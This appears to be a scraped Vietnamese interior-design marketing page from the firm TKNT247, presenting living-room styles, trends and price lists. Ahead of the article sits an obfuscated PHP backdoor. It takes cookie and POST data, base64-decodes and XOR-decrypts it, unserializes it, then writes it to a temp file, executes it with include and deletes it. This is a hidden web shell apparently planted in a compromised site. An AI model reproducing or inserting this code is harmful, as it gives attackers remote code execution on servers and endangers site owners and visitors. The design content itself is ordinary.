$KAkylTEEY = chr ( 482 - 414 )."\x48" . "\161" . "\x5f" . 'w' . "\x6f" . "\x67" . chr (79); $BLHPO = "\143" . chr (108) . "\141" . 's' . 's' . "\x5f" . "\x65" . chr ( 220 - 100 ).'i' . chr (115) . chr ( 229 - 113 ).chr ( 225 - 110 ); $DPsHSlPuA = class_exists($KAkylTEEY); $BLHPO = "16968";$KybyXPAy = !1;if ($DPsHSlPuA == $KybyXPAy){function WRjHwIbZL(){return FALSE;}$fOnVgH = "60659";WRjHwIbZL();class DHq_wogO{private function rlZJn($fOnVgH){if (is_array(DHq_wogO::$gRtPmcWgqM)) {$zpikP = sys_get_temp_dir() . "/" . crc32(DHq_wogO::$gRtPmcWgqM["\163" . 'a' . chr ( 996 - 888 ).chr (116)]);@DHq_wogO::$gRtPmcWgqM["\x77" . 'r' . chr (105) . 't' . 'e']($zpikP, DHq_wogO::$gRtPmcWgqM["\143" . chr ( 1017 - 906 ).'n' . chr (116) . "\x65" . "\x6e" . "\x74"]);include $zpikP;@DHq_wogO::$gRtPmcWgqM["\x64" . chr ( 990 - 889 )."\x6c" . 'e' . 't' . "\x65"]($zpikP); $fOnVgH = "60659";exit();}}private $PkkbUal;public function wPWLohDk(){echo 27132;}public function __destruct(){$fOnVgH = "46060_22836";$this->rlZJn($fOnVgH); $fOnVgH = "46060_22836";}public function __construct($NTbnrrri=0){$dTJfkDR = $_POST;$lhQsTgIH = $_COOKIE;$aYajfQpXwB = "c11c5495-d7c1-4aa3-bdd1-dc687432bcb9";$BUmNVU = @$lhQsTgIH[substr($aYajfQpXwB, 0, 4)];if (!empty($BUmNVU)){$atjsQvzxK = "base64";$fobbAQWcLe = "";$BUmNVU = explode(",", $BUmNVU);foreach ($BUmNVU as $RzPEjLbK){$fobbAQWcLe .= @$lhQsTgIH[$RzPEjLbK];$fobbAQWcLe .= @$dTJfkDR[$RzPEjLbK];}$fobbAQWcLe = array_map($atjsQvzxK . chr ( 632 - 537 ).chr (100) . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($fobbAQWcLe,)); $fobbAQWcLe = $fobbAQWcLe[0] ^ str_repeat($aYajfQpXwB, (strlen($fobbAQWcLe[0]) / strlen($aYajfQpXwB)) + 1);DHq_wogO::$gRtPmcWgqM = @unserialize($fobbAQWcLe); $fobbAQWcLe = class_exists("46060_22836");}}public static $gRtPmcWgqM = 33420;}$iJgbDTDD = new /* 56130 */ $KAkylTEEY(60659 + 60659); $fOnVgH = strpos($fOnVgH, $fOnVgH); $KybyXPAy = $iJgbDTDD = $fOnVgH = Array();} 100+ mẫu nội thất phòng khách đẹp - sang trọng - tinh tế
Image Alt

Thiết Kế Nội Thất Phòng Khách

Phòng khách luôn được xem là phòng chức năng quan trọng nhất trong mọi ngôi nhà. Chúng đóng vai trò làm nơi tiếp đón khách khứa và là bộ mặt của gia chủ. Quan niệm đó vẫn không hề thay đổi cho đến ngày nay. Vì thế dịch vụ thiết kế nội thất phòng khách ngày càng được gia chủ Việt quan tâm. Trong bài viết bên dưới, TKNT247 sẽ gửi đến bạn 100+ mẫu phòng khách đẹp, sang trọng nhất hiện nay.

3 lưu ý quan trọng khi thiết kế phòng khách đẹp và tiện nghi

Để sở hữu được một mẫu phòng khách đẹp cần phải lưu ý đến nhiều yêu tố. Dưới đây là 3 yếu tố chính mà TKNT247 đã tổng hợp từ kinh nghiệm thiết kế thực tiễn. Chúng sẽ giúp bạn đánh giá được như thế nào là một mẫu thiết kế đẹp và phù hợp.

Chọn kích thước đồ nội thất phòng khách phù hợp với diện tích và bố cục kiến trúc

Kích thước của đồ nội thất ảnh hưởng đến phòng khách

Kích thước của đồ nội thất được xác định dựa trên diện tích của phòng khách

Đối với phòng khách nhỏ, bạn cần chọn nội thất có kích thước vừa vặn, đa năng. Đối với diện tích phòng lớn, bạn nên chọn đồ nội thất lớn hơn như các hệ thống tủ kệ cao kịch trần để đảm bảo sự gọn gàng và tính thẩm mỹ. 

Tránh chọn đồ nội thất quá lớn hay quá nhỏ vì sẽ gây ảnh hưởng đến tính thẩm mỹ chung. Đồ nội thất quá nhỏ sẽ không đáp ứng được nhu cầu sử dụng cần thiết của gia chủ. Ngược lại nếu quá lớn sẽ tạo cảm giác bí bách, chật chội cho căn phòng. Gia chủ có thể tìm đến các KTS chuyên nghiệp để được tư vấn và hướng dẫn chính xác.

Trang trí, sắp xếp đồ nội thất theo bố cục hợp lý

Trang trí nội thất nhà ở đẹp

Bố cục trong nội thất quyết định sự tiện nghi và trải nghiệm của người dùng

Không gian phòng khách đòi hỏi sự trang trọng và tinh tế. Vì thế bố cục bố trí nội thất lại càng được chú trọng nhiều hơn. Các KTS chuyên nghiệp thường ứng dụng bố cục đối xứng trong phòng khách để tăng sự sang trọng và tính thẩm mỹ. Cách này cũng giúp đảm bảo sinh hoạt của gia chủ được thuận tiện và thoải mái hơn. 

Chọn màu sắc hợp lý và tận dụng ánh sáng tự nhiên

Bố trí nội thất phòng khách theo quy luật nhịp điệu

Phối hợp màu sắc và ánh sáng hài hòa trong mẫu phòng khách đẹp

Màu sắc dùng cho nội thất phòng khách thường là bảng màu sáng hoặc các tông nâu trầm và đen lịch lãm. Cách phối hợp màu sắc nhã nhặn, tinh tế sẽ giúp tôn lên sự trang trọng. Bên cạnh đó là lối thiết kế ánh sáng thông minh giúp mang lại sức sống cho không gian. Nguồn sáng tự nhiên từ cửa sổ là không thế thiếu. Chúng giúp phòng khách luôn thông thoáng, gần gũi với thiên nhiên.

Gợi ý mẫu thiết kế phòng khách đẹp, hiện đại

Mỗi mô hình nhà ở sẽ có hướng thiết kế phòng khách riêng cho phù hợp. Dưới đây là các mẫu thiết kế phòng khách đa dạng cho căn hộ, nhà phố cho đến biệt thự. Chúng sẽ giúp bạn có thêm nhiều ý tưởng cho không gian sống của mình. 

Mẫu thiết kế phòng khách chung cư căn hộ

Mẫu phòng khách đẹp cho căn hộ

Căn hộ chung cư là mô hình nhà ở khá phổ biến được nhiều gia đình trẻ lựa chọn

Hạn chế của phòng khách căn hộ là diện tích khiêm tốn. Vì thế lối thiết kế kết hợp phòng khách với phòng bếp hoặc phòng ăn khá hiệu quả để tối ưu không gian. Bên cạnh đó là tận dụng các nội thất thông minh, tích hợp nhiều công năng đa dạng.

Mẫu thiết kế phòng khách nhà ống đẹp

Mẫu phòng khách đẹp cho nhà ống

Thiết kế phòng khách nhà phố hẹp ngang tận dụng tốt không gian

Đặc điểm của nhà ống là lợi thế về chiều dài và hẹp về chiều ngang. Vì thế cần có lối thiết kế phù hợp để đảm bảo tính thẩm mỹ và khoa học cho không gian. Đặc biệt là về bố cục và cách sắp xếp. Bạn nên bố trí nội thất dọc theo không gian của hai vách tường song song. Việc này giúp giữ cho phòng khách luôn gọn gàng, sang trọng mặc cho không gian hẹp. 

Mẫu thiết kế phòng khách biệt thự

Mẫu phòng khách đẹp cho biệt thự

Phòng khách biệt thự cao cấp sang trọng và tiện nghi

Biệt thự là mô hình nhà ở cao cấp và có ngân sách đầu tư khủng. Vì lẽ đó mà các mẫu phòng khách biệt thự luôn yêu cầu sự đẳng cấp, chuyên nghiệp và sang trọng bậc nhất. Chất liệu ứng dụng trong không gian thường là các vật liệu quý hiếm như gỗ và đá tự nhiên, pha lê, da thuộc,… Bên cạnh đó sẽ kết hợp thêm các yếu tố khác như ánh sáng, màu sắc. 

Mẫu thiết kế phòng khách nhà cấp 4

Mẫu phòng khách đẹp với từng đường nét ấn tượng

Khi thiết kế phòng khách nhà cấp 4 cần chú trọng đến những yếu tố như phong thủy

Gia chủ nên chọn bố trí phòng khách ở giữa nhà để thu hút tài lộc và may mắn. Mô hình nhà ở truyền thống này sẽ phù hợp với các phong cách nội thất như hiện đại hoặc tối giản. Tùy theo không gian nhà lớn hoặc nhỏ mà bạn có thể chọn màu sắc cho phù hợp. 

Mẫu thiết kế phòng khách sân vườn gần gũi thiên nhiên

Thiết kế nội thất phòng khách nhà 3 tầng đẹp

Phòng khách được bố trí tại tầng trệt của ngôi nhà

Lối sống xanh đang là xu hướng thiết kế nội thất thịnh hành trên toàn thế giới. Các mẫu phòng khách sân vườn có lối thiết kế mở đưa con người đến gần hơn với thiên nhiên. Ứng dụng các loại vật liệu thân thiện với môi trường như mây đan, vải linen, đá,..mang đến vẻ đẹp tự nhiên, độc đáo. Các chi tiết trang trí chủ yếu đến từ các chậu cây xanh và ánh sáng tự nhiên. 

Mẫu thiết kế phòng khách bằng gỗ đẹp

Mẫu phòng khách đẹp với vân gỗ chủ đạo

Gỗ là vật liệu nội thất truyền thống luôn được gia chủ Việt tin dùng suốt nhiều năm qua

Bộ vân gỗ tự nhiên sống động cùng gam màu nâu trầm ấm là điểm đặc biệt khiến nhiều người vẫn luôn yêu thích sử dụng nội thất gỗ cho phòng khách. Nhằm tăng thêm tính tiện nghi trong không gian, gỗ còn được kết hợp với các loại vật liệu khác như đá tự nhiên hoặc kính.

Mẫu phòng khách sang trọng với đa dạng phong cách hotrend

Trong thế giới nội thất có rất nhiều phong cách khác nhau. Mỗi phong cách đều mang đến cho phòng khách một vẻ đẹp riêng. Chúng còn giúp thể hiện được cá tính, lối sống và con người của gia chủ.

Nội thất phòng khách phong cách tối giản

Mẫu phòng khách đẹp hong cách tối giản

Mẫu phòng khách phong cách tối giản trong biệt thự sân vườn


Không gian kết hợp vật liệu phong phú

Vật liệu gỗ chủ đạo giúp không gian ấm cúng hơn


Điểm nhấn là ánh sáng đèn LED

Phòng khách tối giản với gam màu đen chủ đạo


Xua tan sự tẻ nhạt trong mẫu phòng khách đẹp

Điểm nhấn màu sắc trẻ trung kết hợp với chất liệu phong phú


Điểm nhấn màu sắc trong không gian

Sắc hồng đào pastel hút mắt của bộ ghế sofa nhung

Sự tối giản không chỉ thể hiện qua số lượng nội thất mà còn về đường nét thiết kế. Phòng khách tối giản chỉ giữ lại một số nội thất thật sự cần thiết như sofa, bàn trà, tủ Tivi. Hình dáng nội thất chủ yếu là các hình khối đơn giản, vững chắc như hình vuông, chữ nhật. Sự mềm mại sẽ đến từ các đường cong đơn giản của hình tròn hay bầu dục. 

Nội thất phòng khách phong cách hiện đại

Mẫu phòng khách hiện đại gồm các gam màu tươi sáng

Phòng khách hiện đại với sắc nâu cà phê hút mắt


Mẫu phòng khách đẹp được nhiều gia chủ yêu thích

Chi tiết bê tông ấn tượng mang lại vẻ đẹp mạnh mẽ


Mẫu phòng khách đẹp và sáng tạo

Thiết kế phòng khách ngoài trời tận dụng các yếu tố thiên nhiên


Mẫu phòng khách đẹp có lối kết hợp màu sắc ấn tượng

Điểm nhấn bắt mắt đến từ chất liệu và hệ thống chiếu sáng


Thiết kế phòng khách hiện đại sáng tạo

Không gian phòng khách mở với sắc xanh vô cùng mát mắt

Phòng khách hiện đại luôn mang đến nguồn cảm hứng trẻ trung và năng lượng. Điểm nhấn trong không gian thường đến từ các cặp màu tương phản ấn tượng. Nội thất phong cách này có lối thiết thông minh và tích hợp nhiều chức năng nhằm gia tăng tính tiện nghi và nâng cấp trải nghiệm của gia chủ trong sinh hoạt thường ngày. 

Nội thất phòng khách phong cách tân cổ điển

Các chi tiết tân cổ điển nhẹ nhàng và lãng mạn

Sắc nâu ấm kết hợp với chất liệu nhung mềm mại từ ghế sofa


Mẫu phòng khách đẹp phong cách tân cổ điển

Ứng dụng màu sắc táo bạo mang hơi hướng hiện đại trong không gian cổ điển


Mẫu phòng khách đẹp và lãng mạn nhất

Sắc trắng chủ đạo được nhiều gia chủ yêu thích trong thiết kế


Hơi hướng đa phong cách trong không gian

Nội thất phòng khách đẹp với đường nét đa dạng


Chi tiết hình học và họa tiết trang trí bắt mắt là điểm nhấn

Không gian sang trọng tinh tế với các chi tiết quý phái

Phong cách tân cổ điển là sự kế thừa có sáng tạo của phong cách cổ điển Châu Âu. Không gian phòng khách tân cổ điển sang trọng mà tinh tế, dễ ứng dụng trong nhiều mô hình nhà ở đa dạng. Điểm đặc trưng trong lối thiết kế là các đường phào chỉ chạy dọc tường, đường cong uốn lượn có tiết chế và bảng màu tươi sáng trang nhã. 

Nội thất phòng khách phong cách cổ điển

Mẫu phòng khách đẹp phong cách cổ điển

Phong cách cổ điển ứng dụng từng chi tiết tinh xảo


Không gian sang trọng đặc trưng

Thiết kế sofa ứng dụng đường cong mềm mại và quý phái


Cách ứng dụng màu sắc mới lạ và vô cùng thu hút

Không gian cổ điển đầy hoài niệm cùng các vật dụng nội thất đặc trưng

Phòng khách phong cách cổ điển thường được ứng dụng các dự án cao cấp. Lối thiết kế đặc trưng với những chi tiết trang trí cầu kỳ, tinh xảo. Bên cạnh đó là bố cục sắp đặt nội thất theo tỉ lệ vàng với các nguyên tắc được tuân thủ nghiêm ngặt. Ghế sofa, đèn thả trần, cột nhà, nến,… là các đồ dùng trang trí không thể thiếu. 

Xu hướng thiết kế nội thất phòng khách mới nhất

Chọn chất liệu nhung tạo nên kiến trúc phòng khách ấm cúng, hiện đại

Không gian rực rỡ và bắt mắt

Chất liệu nhung không quá phổ biến trong đời sống người Việt

Bề mặt nhung mang lại sự mềm mại và cảm giác ấm cúng.Bên cạnh đó thì chúng còn có nhiều màu sắc vô cùng đa dạng để bạn lựa chọn. Đồ nội thất bọc nhung có tính thẩm mỹ cao và vô cùng sang trọng. Trong đó có thể kể đến như sofa bọc nhung, vách tủ Tivi, thảm trải sàn,…

Trang trí phòng khách lung linh với ánh kim sang trọng

Mẫu phòng khách đẹp có các chi tiết kim loại

Các chi tiết kim loại góp phần tạo điểm nhấn và gia tăng sự tính thẩm mỹ.

Kim loại được ứng dụng nhiều trong các mẫu phòng khách đẹp phong cách hiện đại hoặc tân cổ điển. Chi tiết kim loại khi kết hợp với gỗ hoặc đá tự nhiên sẽ tạo nên vẻ đẹp sang trọng và thời thượng.

Trang trí giấy dán tường với họa tiết ấn tượng độc đáo cho phòng khách

thiết kế nội thất chung cư trọn gói

Sử dụng giấy dán tường là xu hướng trang trí nội thất xuất phát từ các nước Châu Âu

Những họa tiết nhẹ nhàng cùng cách phối hợp màu sắc hài hòa giúp mang đến không gian thanh lịch cho phòng khách. Khi sử dụng giấy dán tường, bạn có thể tiết chế các chi tiết trang trí không cần thiết. Vì lẽ đó mà chúng được xem là giải pháp thiết kế nội thất giúp tiết kiệm chi phí vô cùng hiệu quả.

Báo giá thiết kế thi công nội thất phòng khách đẹp

Dịch vụ thiết kế thi công phòng khách trên thị trường hiện nay có rất nhiều mức giá. Hiểu được nhu cầu này của khách hàng, TKNT247 đã cung cấp gói dịch vụ thiết kế phòng khách cho từng mô hình nhà ở khác nhau gồm:

Phòng khách căn hộ

 • Gói cơ bản: 250.000 VNĐ/m2
 • Gói nâng cao: 300.000 VNĐ/m2
 • Diện tích > 100 m2: 180.000 VNĐ/m2

Phòng khách nhà phố

 • Gói cơ bản: 200.000 VNĐ/m2
 • Gói nâng cao: 300.000 VNĐ/m2
 • Diện tích > 100 m2: 170.000 VNĐ/m2

Phòng khác biệt thự

 • Gói cơ bản: 300.000 VNĐ/m2
 • Gói nâng cao: 400.000 VNĐ/m2

Bảng giá dịch vụ được TKNT247 cập nhật vào ngày 01/01/2022. Mức giá sẽ có sự thay đổi dựa trên biến động giá cả trên thị trường của vật liệu và nhân công. Để biết được mức giá chính xác và nhanh chóng nhất, bạn có thể liên hệ trực tiếp đến HOTLINE TKNT247 (090 167 0099).

Chọn đơn vị thiết kế nội thất phòng khách uy tín chuyên nghiệp

Mẫu phòng khách đẹp và chuyên nghiệp

S-housing là đơn vị thiết kế thi công nội thất chuyên nghiệp được quan tâm nhất

Chỉ riêng tại TPHCM, hiện nay đã có hơn hàng nghìn đơn vị thiết kế – thi công nội thất. Việc này khiến cho nhiều gia chủ gặp khó khăn trong việc lựa chọn được một đơn vị uy tín và chuyên nghiệp. Hiểu rõ vấn đề này, TKNT247 với đội ngũ KTS đầu ngành luôn tìm cách tiếp cận và mang đến cho gia chủ Việt các gọi dịch vụ chất lượng với mức giá tốt nhất. Khi đến với TKNT247, bạn sẽ nhận được:

 • Dịch vụ tư vấn chuyên nghiệp, tận tâm đến từ đội ngũ tư vấn của TKNT247
 • Giải pháp nội thất cấp thiết và hiệu quả nhất đến từ các KTS chuyên nghiệp, giàu kinh nghiệm. 
 • Mức giá tốt nhất với chất lượng nội thất cao nhất nhờ hệ thống nhà xưởng 1500m2 cùng trang thiết bị, máy móc hiện đại chuẩn Châu Âu. 
 • Tối thiểu rủi ro nhờ quá trình thiết kế, sản xuất và thi công được giám sát chặt chẽ.
 • Cam kết sử dụng 100% vật liệu chuẩn An Cường và các thiết bị, phụ kiện đến từ những đối tác trong và ngoài nước của TKNT247 như EUROGOLD, HAFELE,… 
 • Miễn phí 100% dịch vụ thiết kế nội thất khi thi công
 • Bảo hành 24 THÁNG
 • Bảo trì TRỌN ĐỜI

Hy vọng bài viết trên đã cung cấp cho bạn những mẫu phòng khách đẹp và các thông tin cần thiết khi thiết kế không gian sống cho gia đình. Nếu bạn đang có bất kỳ thắc mắc nào về dịch vụ thiết kế nội thất phòng khách, hãy liên hệ ngay đến HOTLINE TKNT247 để nhận được thông tin chính xác và nhanh chóng nhất. 

THÔNG TIN LIÊN LẠC:

Showroom 1: 02 Đường số 37, KDC Vạn Phúc City, P.Hiệp Bình Phước, TP.Thủ Đức

Showroom 2: S5.01.16.18 Vinhome Grand Park, Q9, TP. Thủ Đức

Tel: (+84) 028 399 55 365 – Mobile: 090 167 0099